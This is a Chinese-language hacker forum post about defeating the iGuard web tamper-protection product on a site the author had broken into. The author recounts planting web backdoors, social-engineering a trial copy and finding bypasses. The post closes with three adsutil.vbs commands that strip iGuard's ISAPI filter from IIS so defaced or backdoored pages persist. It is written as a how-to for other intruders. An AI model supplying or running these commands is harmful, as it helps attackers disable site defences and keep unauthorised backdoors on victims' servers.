前段時間在搞一個受到網頁防篡改保護的網站,之前不知道有這東西,後來在植入web後門的時候,老是被删掉,郁悶...
困擾了整整一天後,在翻看C槽時,發現根目錄下一個奇怪的檔案夾"Tercel",找了幾個檔案研究,才知道這裡有一個叫iGuard的網頁防篡改...汗死..不懂這東西,立即google惡補下,找到官網,居然不提供下載下傳,囧~~
不過,根據我的經驗,不提供下載下傳的軟體基本上都會有一堆毛病,哈哈...
之後通過社工騙取了一套試用版,接下來的2天裡,通過在虛拟機中反複測試,終于把這東西的原理摸熟了,并找到8種辦法突破iGuard的保護,其中有幾種不用管理者權限就能突破.2天的成果,分享出來讓後來者少走彎路,以後再遇到這種系統保護的網站要繞過它就輕車熟路了.
這裡先簡單說下iGuard的原理,這東西會在IIS/Apache中安插一個ISAPI過濾器(ISAPI Filter)/Apache子產品,這個子產品對你請求的每一個網頁都計算一下它的MD5值,然後跟自己MD5庫中記錄的進行比較,如果一緻就說明沒有篡改,放行通過,如果不一緻,就攔截,并立即恢複網頁(這也是為什麼之前我在網頁中插入後門,然後通路後門,就會立即被删除的原因).
OK,知己知彼,百戰不殆,在了解了它的原理後,要對付它就容易多了,何況這個iGuard設計上就有衆多安全隐患.
因為突破方法比較多,是以我打包成一個rar(視訊+文字解說).
邪8這裡上傳15MB的附件老是出錯,郁悶,沒法子,隻好放過地方了,下載下傳位址:
如果比較懶,不想看詳細視訊示範資料,可以直接用下面的這個方法讓iGuard失效:
原理:因為iGuard 數字水印檢測功能的實作,完全依賴于一個 ISAPI 篩選器子產品,隻要把這個篩選器删除,就可以讓篡改網頁随意留出了...不管這個iGuard是不是雙機部署,不管采取什麼水印,立刻統統失效.
操作:用下面三條cmd指令,就可以把iGuard的 ISAPI 篩選器子產品删掉.
複制内容到剪貼闆
<code>//cmd 查找 iGuard 的 ISAPI 篩選器子產品,同時擷取網站ID... cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs enum_all w3svc /p | find "iguard" /i //cmd 擷取指定網站的 FilterLoadOrder 序列... cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs get w3svc/xxx/filters/FilterLoadOrder //cmd 設定新的 FilterLoadOrder 序列到指定網站... cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set w3svc/xxx/filters/FilterLoadOrder ""</code>
删除iGuard的 ISAPI 篩選器子產品後,咱們就可以随意修改網頁了,hoho~~
![搭建httpd服務[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)